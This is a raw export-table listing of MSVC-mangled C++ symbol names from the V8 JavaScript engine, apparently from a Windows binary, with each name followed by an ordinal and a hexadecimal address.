                                  ?Int32LessThanOrEqual@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UBoolT@internal@v8@@@34@V?$SloppyTNode@UWord32T@internal@v8@@@34@0@Z75090x140e6f1a0
                                  ?Int32LessThanOrEqual@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z75100x140ec5800
                                  ?Int32LessThanOrEqual@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ75110x140e198e0
                                  ?Int32LessThanOrEqual@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z75120x140e6f210
                                  ?Int32Mod@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UInt32T@internal@v8@@@34@V?$SloppyTNode@UInt32T@internal@v8@@@34@0@Z75130x140e6f270
                                  ?Int32Mod@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z75140x140ec58b0
                                  ?Int32Mod@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ75150x140e199a0
                                  ?Int32Mod@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z75160x140e6f2e0
                                  ?Int32Mod@SimplifiedLowering@compiler@internal@v8@@AEAAPEAVNode@234@QEAV5234@@Z75170x140fd6eb0
                                  ?Int32Mul@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UInt32T@internal@v8@@@34@V534@0@Z75180x1409e9cb0
                                  ?Int32Mul@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UWord32T@internal@v8@@@34@V?$SloppyTNode@UWord32T@internal@v8@@@34@0@Z75190x140e6f340
                                  ?Int32Mul@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z75200x140ec5970
                                  ?Int32Mul@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ75210x140e19a60
                                  ?Int32Mul@MachineOperatorReducer@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@0@Z75220x140faa200
                                  ?Int32Mul@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z75230x140e6f3b0
                                  ?Int32MulHigh@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ75240x140e19b20
                                  ?Int32MulHigh@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z75250x140e6f410
                                  ?Int32MulWithOverflow@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@U?$PairT@UInt32T@internal@v8@@UBoolT@23@@internal@v8@@@34@V?$SloppyTNode@UInt32T@internal@v8@@@34@0@Z75260x140e6f470
                                  ?Int32MulWithOverflow@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z75270x140ec5a20
                                  ?Int32MulWithOverflow@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ75280x140e19be0
                                  ?Int32MulWithOverflow@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z75290x140e6f4e0
                                  ?Int32Neg@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z75300x140e6f540
                                  ?Int32OperatorFor@RepresentationChanger@compiler@internal@v8@@QEAAPEBVOperator@234@W4Value@IrOpcode@234@@Z75310x141001670
                                  ?Int32OverflowOperatorFor@RepresentationChanger@compiler@internal@v8@@QEAAPEBVOperator@234@W4Value@IrOpcode@234@@Z75320x1410017d0
                                  ?Int32PairAdd@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ75330x140e19ca0
                                  ?Int32PairAdd@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@000@Z75340x140e6f5b0
                                  ?Int32PairMul@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ75350x140e19d60
                                  ?Int32PairMul@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@000@Z75360x140e6f630
                                  ?Int32PairSub@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ75370x140e19e20
                                  ?Int32PairSub@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@000@Z75380x140e6f6b0
                                  ?Int32Sign@SimplifiedLowering@compiler@internal@v8@@AEAAPEAVNode@234@QEAV5234@@Z75390x140fd7650
                                  ?Int32Sub@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UInt32T@internal@v8@@@34@V534@0@Z75400x1409e9ce0
                                  ?Int32Sub@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UWord32T@internal@v8@@@34@V?$SloppyTNode@UWord32T@internal@v8@@@34@0@Z75410x140e6f730
                                  ?Int32Sub@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z75420x140ec5ae0
                                  ?Int32Sub@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ75430x140e19ee0
                                  ?Int32Sub@MachineOperatorReducer@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@0@Z75440x140faa260
                                  ?Int32Sub@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z75450x140e6f7a0
                                  ?Int32SubWithOverflow@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@U?$PairT@UInt32T@internal@v8@@UBoolT@23@@internal@v8@@@34@V?$SloppyTNode@UInt32T@internal@v8@@@34@0@Z75460x140e6f800
                                  ?Int32SubWithOverflow@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z75470x140ec5b90
                                  ?Int32SubWithOverflow@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ75480x140e19fa0
                                  ?Int32SubWithOverflow@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z75490x140e6f870
                                  ?Int32TrueConstant@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UBoolT@internal@v8@@@34@XZ75500x1409e9d10
                                  ?Int32Value@Value@v8@@QEBA?AV?$Maybe@H@2@V?$Local@VContext@v8@@@2@@Z75510x140a92590
                                  ?Int64AbsWithOverflow@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@U?$PairT@UInt64T@internal@v8@@UBoolT@23@@internal@v8@@@34@V?$SloppyTNode@UInt64T@internal@v8@@@34@@Z75520x140e6f8d0
                                  ?Int64AbsWithOverflow@MachineOperatorBuilder@compiler@internal@v8@@QEAA?BVOptionalOperator@234@XZ75530x140e1a060
                                  ?Int64AbsWithOverflow@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z75540x140e6f930
                                  ?Int64Add@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ75550x140e1a140
                                  ?Int64Add@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z75560x140e6f980
                                  ?Int64AddWithOverflow@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ75570x140e1a200
                                  ?Int64AddWithOverflow@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z75580x140e6f9e0
                                  ?Int64Constant@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UInt64T@internal@v8@@@34@_J@Z75590x140e6fa40
                                  ?Int64Constant@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@_J@Z75600x140e0b1b0
                                  ?Int64Constant@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@_J@Z75610x140ec5c50
                                  ?Int64Constant@MachineGraph@compiler@internal@v8@@QEAAPEAVNode@234@_J@Z75620x140ea62b0
                                  ?Int64Constant@MachineOperatorReducer@compiler@internal@v8@@AEAAPEAVNode@234@_J@Z75630x140faa2f0
                                  ?Int64Constant@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@_J@Z75640x140e6fa70
                                  ?Int64Div@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ75650x140e1a2c0
                                  ?Int64Div@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z75660x140e6faa0
                                  ?Int64GreaterThan@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z75670x140e6fb00
                                  ?Int64GreaterThanOrEqual@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z75680x140e6fb60
                                  ?Int64LessThan@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ75690x140e1a380
                                  ?Int64LessThan@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z75700x140e6fbc0
                                  ?Int64LessThanOrEqual@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ75710x140e1a440
                                  ?Int64LessThanOrEqual@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z75720x140e6fc20
                                  ?Int64Mod@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ75730x140e1a500
                                  ?Int64Mod@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z75740x140e6fc80
                                  ?Int64Mul@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ75750x140e1a5c0
                                  ?Int64Mul@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z75760x140e6fce0
                                  ?Int64Neg@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z75770x140e6fd40
                                  ?Int64OperatorFor@RepresentationChanger@compiler@internal@v8@@QEAAPEBVOperator@234@W4Value@IrOpcode@234@@Z75780x141001850
                                  ?Int64Sub@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z75790x140ec5ca0
                                  ?Int64Sub@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ75800x140e1a680
                                  ?Int64Sub@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z75810x140e6fdb0
                                  ?Int64SubWithOverflow@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ75820x140e1a740
                                  ?Int64SubWithOverflow@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z75830x140e6fe10
                                  ?Int64Value@BigInt@v8@@QEBA_JPEA_N@Z75840x140a928a0
                                  ?Int8Array@AsmType@wasm@internal@v8@@SAPEAV1234@XZ75850x140a63370
                                  ?Int8Array_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ75860x1404242b0
                                  ?Int8Array_string@OffThreadFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ75870x1407277d0
                                  ?Int@AsmType@wasm@internal@v8@@SAPEAV1234@XZ75880x140a63380
                                  ?IntAdd@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z75890x140ec5d50
                                  ?IntAdd@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ75900x14045c430
                                  ?IntDiv@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ75910x14045c440
                                  ?IntLessThan@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z75920x140ec5e10
                                  ?IntLessThan@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ75930x14045c450
                                  ?IntLessThanOrEqual@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ75940x14045c460
                                  ?IntMod@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ75950x14045c470
                                  ?IntMul@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z75960x140ec5ed0
                                  ?IntMul@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ75970x14045c480
                                  ?IntPtrAbsWithOverflow@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@U?$PairT@UIntPtrT@internal@v8@@UBoolT@23@@internal@v8@@@34@V?$SloppyTNode@UIntPtrT@internal@v8@@@34@@Z75980x140e6f8d0
                                  ?IntPtrAbsWithOverflow@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z75990x140e6f930
                                  ?IntPtrAdd@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UIntPtrT@internal@v8@@@34@V534@0@Z76000x1409e9d40
                                  ?IntPtrAdd@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UWordT@internal@v8@@@34@V?$SloppyTNode@UWordT@internal@v8@@@34@0@Z76010x140e6fe70
                                  ?IntPtrAdd@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z76020x140e6f980
                                  ?IntPtrAddWithOverflow@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@U?$PairT@UIntPtrT@internal@v8@@UBoolT@23@@internal@v8@@@34@V?$SloppyTNode@UIntPtrT@internal@v8@@@34@0@Z76030x140e6fee0
                                  ?IntPtrAddWithOverflow@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z76040x140e6f9e0
                                  ?IntPtrConstant@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UIntPtrT@internal@v8@@@34@_J@Z76050x140e6ff50
                                  ?IntPtrConstant@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@_J@Z76060x140ec5f90
                                  ?IntPtrConstant@MachineGraph@compiler@internal@v8@@QEAAPEAVNode@234@_J@Z76070x140ea6320
                                  ?IntPtrConstant@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@_J@Z76080x140e6fa70
                                  ?IntPtrDiv@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UIntPtrT@internal@v8@@@34@V?$SloppyTNode@UIntPtrT@internal@v8@@@34@0@Z76090x140e6ff80
                                  ?IntPtrDiv@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z76100x140e6faa0
                                  ?IntPtrEqual@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UBoolT@internal@v8@@@34@V?$TNode@UWordT@internal@v8@@@34@0@Z76110x140e6fff0
                                  ?IntPtrEqual@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z76120x140ec5fe0
                                  ?IntPtrEqual@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z76130x140e700b0
                                  ?IntPtrGreaterThan@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UBoolT@internal@v8@@@34@V?$SloppyTNode@UWordT@internal@v8@@@34@0@Z76140x140e70110
                                  ?IntPtrGreaterThan@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z76150x140e6fb00
                                  ?IntPtrGreaterThanOrEqual@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UBoolT@internal@v8@@@34@V?$SloppyTNode@UWordT@internal@v8@@@34@0@Z76160x140e70180
                                  ?IntPtrGreaterThanOrEqual@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z76170x140e6fb60
                                  ?IntPtrLessThan@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UBoolT@internal@v8@@@34@V?$SloppyTNode@UWordT@internal@v8@@@34@0@Z76180x140e701f0
                                  ?IntPtrLessThan@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z76190x140e6fbc0
                                  ?IntPtrLessThanOrEqual@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UBoolT@internal@v8@@@34@V?$SloppyTNode@UWordT@internal@v8@@@34@0@Z76200x140e70260
                                  ?IntPtrLessThanOrEqual@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z76210x140e6fc20
                                  ?IntPtrMul@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UIntPtrT@internal@v8@@@34@V534@0@Z76220x1409e9d70
                                  ?IntPtrMul@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UWordT@internal@v8@@@34@V?$SloppyTNode@UWordT@internal@v8@@@34@0@Z76230x140e702d0
                                  ?IntPtrMul@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z76240x140e6fce0
                                  ?IntPtrNotEqual@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z76250x140e70340
                                  ?IntPtrSub@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UIntPtrT@internal@v8@@@34@V534@0@Z76260x1409e9da0
                                  ?IntPtrSub@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UWordT@internal@v8@@@34@V?$SloppyTNode@UWordT@internal@v8@@@34@0@Z76270x140e703a0
                                  ?IntPtrSub@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z76280x140e6fdb0
                                  ?IntPtrSubWithOverflow@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@U?$PairT@UIntPtrT@internal@v8@@UBoolT@23@@internal@v8@@@34@V?$SloppyTNode@UIntPtrT@internal@v8@@@34@0@Z76290x140e70410
                                  ?IntPtrSubWithOverflow@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z76300x140e6fe10
                                  ?IntSub@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@0@Z76310x140ec5ff0
                                  ?IntSub@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ76320x14045c490
                                  ?IntToCString@internal@v8@@YAPEBDHV?$Vector@D@12@@Z76330x140846e70
                                  ?IntegerValue@Value@v8@@QEBA?AV?$Maybe@_J@2@V?$Local@VContext@v8@@@2@@Z76340x140a928c0
                                  ?Integral32@Type@compiler@internal@v8@@SA?AV1234@XZ76350x14045c4a0
                                  ?Integral32OrMinusZero@Type@compiler@internal@v8@@SA?AV1234@XZ76360x14045c4b0
                                  ?Integral32OrMinusZeroOrNaN@Type@compiler@internal@v8@@SA?AV1234@XZ76370x14045c4c0
                                  ?InterferesWith@InstructionOperand@compiler@internal@v8@@QEBA_NAEBV1234@@Z76380x140e04ed0
                                  ?Internal@Type@compiler@internal@v8@@SA?AV1234@XZ76390x14045c4d0
                                  ?InternalFieldCount@Object@v8@@QEAAHXZ76400x140a92c10
                                  ?InternalFieldCount@Object@v8@@SAHAEBV?$PersistentBase@VObject@v8@@@2@@Z76410x140076b40
                                  ?InternalFieldCount@Object@v8@@SAHAEBV?$TracedReferenceBase@VObject@v8@@@2@@Z76420x140076b40
                                  ?InternalFieldCount@ObjectTemplate@v8@@QEAAHXZ76430x140a92cb0
                                  ?InternalFieldOutOfBounds@V8@v8@@CAXH@Z76440x140a92dc0
                                  ?InternalUpdateProtector@LookupIterator@internal@v8@@CAXPEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@@Z76450x14079cff0
                                  ?InternalizeName@Factory@internal@v8@@QEAA?AV?$Handle@VName@internal@v8@@@23@V423@@Z76460x1404242c0
                                  ?InternalizeString@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@V423@@Z76470x140424310
                                  ?InternalizeString@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@V?$Vector@$$CBD@23@_N@Z76480x140424350
                                  ?InternalizeString@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@V?$Vector@$$CBE@23@_N@Z76490x140946ec0
                                  ?InternalizeString@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@V?$Vector@$$CBG@23@_N@Z76500x140946f50
                                  ?InternalizeString@OffThreadFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@AEBV?$Vector@$$CBE@23@@Z76510x1408e47c0
                                  ?InternalizeString@OffThreadFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@AEBV?$Vector@$$CBG@23@@Z76520x1408e4820
                                  ?InternalizeUtf8String@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@AEBV?$Vector@$$CBD@23@@Z76530x140946fe0
                                  ?InternalizeUtf8String@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@PEBD@Z76540x140424390
                                  ?InternalizedString@Type@compiler@internal@v8@@SA?AV1234@XZ76550x14045c4e0
                                  ?InternalizedStringMapForString@Factory@internal@v8@@QEAA?AV?$MaybeHandle@VMap@internal@v8@@@23@V?$Handle@VString@internal@v8@@@23@@Z76560x1409471d0
                                  ?InternalizedStringOrNull@Type@compiler@internal@v8@@SA?AV1234@XZ76570x14045c4f0
                                  ?InterpreterCEntry@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@H@Z76580x1409f95d0
                                  ?InterpreterOnStackReplacement@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@@Z76590x1409f9670
                                  ?InterpreterPushArgsThenCall@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@W4ConvertReceiverMode@23@W4InterpreterPushArgsMode@23@@Z76600x1409f9690
                                  ?InterpreterPushArgsThenConstruct@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@W4InterpreterPushArgsMode@23@@Z76610x1409f9710
                                  ?InterpreterTrampolineSymbolConstantPoolEntry@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA_KXZ76620x1408949f0
                                  ?Intersect@BitVector@internal@v8@@QEAAXAEBV123@@Z76630x140453bf0
                                  ?Intersect@Type@compiler@internal@v8@@SA?AV1234@V1234@0PEAVZone@34@@Z76640x140e2f150
                                  ?IntersectAux@Type@compiler@internal@v8@@CAHV1234@0PEAVUnionType@234@HPEAULimits@RangeType@234@PEAVZone@34@@Z76650x140e2f400
                                  ?IntersectIsChanged@BitVector@internal@v8@@QEAA_NAEBV123@@Z76660x140453c40
                                  ?IntersectRangeAndBitset@Type@compiler@internal@v8@@CA?AULimits@RangeType@234@V1234@0PEAVZone@34@@Z76670x140e2f690
                                  ?Intish@AsmType@wasm@internal@v8@@SAPEAV1234@XZ76680x140a63390
                                  ?Invalid@Type@compiler@internal@v8@@SA?AV1234@XZ76690x1400cbb20
                                  ?InvalidSegment@DateCache@internal@v8@@AEAA_NPEAUDST@123@@Z76700x140676850
                                  ?Invalid_Date_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ76710x1404243d0
                                  ?Invalid_Date_string@OffThreadFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ76720x1407277e0
                                  ?InvalidateArrayBufferDetaching@Protectors@internal@v8@@SAXPEAVIsolate@23@@Z76730x14096e400
                                  ?InvalidateArrayConstructor@Protectors@internal@v8@@SAXPEAVIsolate@23@@Z76740x14096e490
                                  ?InvalidateArrayIteratorLookupChain@Protectors@internal@v8@@SAXPEAVIsolate@23@@Z76750x14096e520
                                  ?InvalidateArraySpeciesLookupChain@Protectors@internal@v8@@SAXPEAVIsolate@23@@Z76760x14096e5b0
                                  ?InvalidateIsConcatSpreadableLookupChain@Protectors@internal@v8@@SAXPEAVIsolate@23@@Z76770x14096e640
                                  ?InvalidateLastBytecode@BytecodeArrayWriter@interpreter@internal@v8@@AEAAXXZ76780x1408894d0
                                  ?InvalidateMapIteratorLookupChain@Protectors@internal@v8@@SAXPEAVIsolate@23@@Z76790x14096e6d0
                                  ?InvalidateNoElements@Protectors@internal@v8@@SAXPEAVIsolate@23@@Z76800x14096e760
                                  ?InvalidatePromiseHook@Protectors@internal@v8@@SAXPEAVIsolate@23@@Z76810x14096e7f0
                                  ?InvalidatePromiseResolveLookupChain@Protectors@internal@v8@@SAXPEAVIsolate@23@@Z76820x14096e880
                                  ?InvalidatePromiseSpeciesLookupChain@Protectors@internal@v8@@SAXPEAVIsolate@23@@Z76830x14096e910
                                  ?InvalidatePromiseThenLookupChain@Protectors@internal@v8@@SAXPEAVIsolate@23@@Z76840x14096e9a0
                                  ?InvalidateRegExpSpeciesLookupChain@Protectors@internal@v8@@SAXPEAVIsolate@23@@Z76850x14096ea30
                                  ?InvalidateSetIteratorLookupChain@Protectors@internal@v8@@SAXPEAVIsolate@23@@Z76860x14096eac0
                                  ?InvalidateStringIteratorLookupChain@Protectors@internal@v8@@SAXPEAVIsolate@23@@Z76870x14096eb50
                                  ?InvalidateStringLengthOverflowLookupChain@Protectors@internal@v8@@SAXPEAVIsolate@23@@Z76880x14096ebe0
                                  ?InvalidateTypedArraySpeciesLookupChain@Protectors@internal@v8@@SAXPEAVIsolate@23@@Z76890x14096ec70
                                  ?Invert@OperationTyper@compiler@internal@v8@@AEAA?AV?$Flags@W4ComparisonOutcomeFlags@OperationTyper@compiler@internal@v8@@H@base@4@V564@@Z76900x140ff9fc0
                                  ?Invert@OperationTyper@compiler@internal@v8@@AEAA?AVType@234@V5234@@Z76910x140ff9ff0
                                  ?InvokeApiInterruptCallbacks@Isolate@internal@v8@@QEAAXXZ76920x14097fec0
                                  ?InvokeFirstPassWeakCallbacks@GlobalHandles@internal@v8@@QEAA_KXZ76930x1409657e0
                                  ?InvokeFunction@MacroAssembler@internal@v8@@QEAAXVRegister@23@000W4InvokeFlag@@@Z76940x14049aab0
                                  ?InvokeFunction@MacroAssembler@internal@v8@@QEAAXVRegister@23@00W4InvokeFlag@@@Z76950x14049ab60
                                  ?InvokeFunctionCode@MacroAssembler@internal@v8@@QEAAXVRegister@23@000W4InvokeFlag@@@Z76960x14049ac50
                                  ?InvokeOrScheduleSecondPassPhantomCallbacks@GlobalHandles@internal@v8@@AEAAX_N@Z76970x140965aa0
                                  ?InvokePrologue@MacroAssembler@internal@v8@@AEAAXVRegister@23@0PEAVLabel@23@W4InvokeFlag@@@Z76980x14049ae00
                                  ?InvokeSecondPassPhantomCallbacks@GlobalHandles@internal@v8@@QEAAXXZ76990x140965c40
                                  ?InvokeSecondPassPhantomCallbacksFromTask@GlobalHandles@internal@v8@@AEAAXXZ77000x140965d30
                                  ?Is32@CodeAssembler@compiler@internal@v8@@QEBA_NXZ77010x140e70480
                                  ?Is32@MachineOperatorBuilder@compiler@internal@v8@@QEBA_NXZ77020x14045c500
                                  ?Is64@CodeAssembler@compiler@internal@v8@@QEBA_NXZ77030x140e70490
                                  ?Is64@MachineOperatorBuilder@compiler@internal@v8@@QEBA_NXZ77040x14045c510
                                  ?Is@BitsetType@compiler@internal@v8@@SA_NII@Z77050x14045c520
                                  ?Is@OrderedHashMap@internal@v8@@SA_NV?$Handle@VHeapObject@internal@v8@@@23@@Z77060x14041c300
                                  ?Is@OrderedHashSet@internal@v8@@SA_NV?$Handle@VHeapObject@internal@v8@@@23@@Z77070x14041c310
                                  ?Is@Type@compiler@internal@v8@@QEBA_NV1234@@Z77080x14045c530
                                  ?IsA@AsmCallableType@wasm@internal@v8@@MEAA_NPEAVAsmType@234@@Z77090x140a633a0
                                  ?IsA@AsmFunctionType@wasm@internal@v8@@EEAA_NPEAVAsmType@234@@Z77100x140a633c0
                                  ?IsA@AsmType@wasm@internal@v8@@QEAA_NPEAV1234@@Z77110x140a634e0
                                  ?IsAbstractInternalClassMap@MapRef@compiler@internal@v8@@QEBA_NXZ77120x140de5480
                                  ?IsAbstractInternalClassSubclass1Map@MapRef@compiler@internal@v8@@QEBA_NXZ77130x140de54a0
                                  ?IsAbstractInternalClassSubclass2Map@MapRef@compiler@internal@v8@@QEBA_NXZ77140x140de54c0
                                  ?IsAccessCheckInfoMap@MapRef@compiler@internal@v8@@QEBA_NXZ77150x140de54e0
                                  ?IsAccessor@?$ParserBase@VParser@internal@v8@@@internal@v8@@KA_NW4ParsePropertyKind@23@@Z77160x140424ba0
                                  ?IsAccessorInfo@ObjectRef@compiler@internal@v8@@QEBA_NXZ77170x140de5500
                                  ?IsAccessorInfoMap@MapRef@compiler@internal@v8@@QEBA_NXZ77180x140de5550
                                  ?IsAccessorPair@AccessorPair@debug@v8@@SA_NV?$Local@VValue@v8@@@3@@Z77190x140a93220
                                  ?IsAccessorPairMap@MapRef@compiler@internal@v8@@QEBA_NXZ77200x140de5570
                                  ?IsAccumulatorLoadWithoutEffects@Bytecodes@interpreter@internal@v8@@SA_NW4Bytecode@234@@Z77210x1404243e0
                                  ?IsActive@Locker@v8@@SA_NXZ77220x14096c080
                                  ?IsActive@Sampler@sampler@v8@@QEBA_NXZ77230x14064e9d0
                                  ?IsAddressableThroughRootRegister@TurboAssemblerBase@internal@v8@@SA_NPEAVIsolate@23@AEBVExternalReference@23@@Z77240x1409d7dc0
                                  ?IsAliasedArgumentsEntryMap@MapRef@compiler@internal@v8@@QEBA_NXZ77250x140de5590
                                  ?IsAllocatableDoubleCode@RegisterConfiguration@internal@v8@@QEBA_NH@Z77260x140451590
                                  ?IsAllocatableFloatCode@RegisterConfiguration@internal@v8@@QEBA_NH@Z77270x1404515a0
                                  ?IsAllocatableGeneralCode@RegisterConfiguration@internal@v8@@QEBA_NH@Z77280x1404515b0
                                  ?IsAllocatableSimd128Code@RegisterConfiguration@internal@v8@@QEBA_NH@Z77290x1404515c0
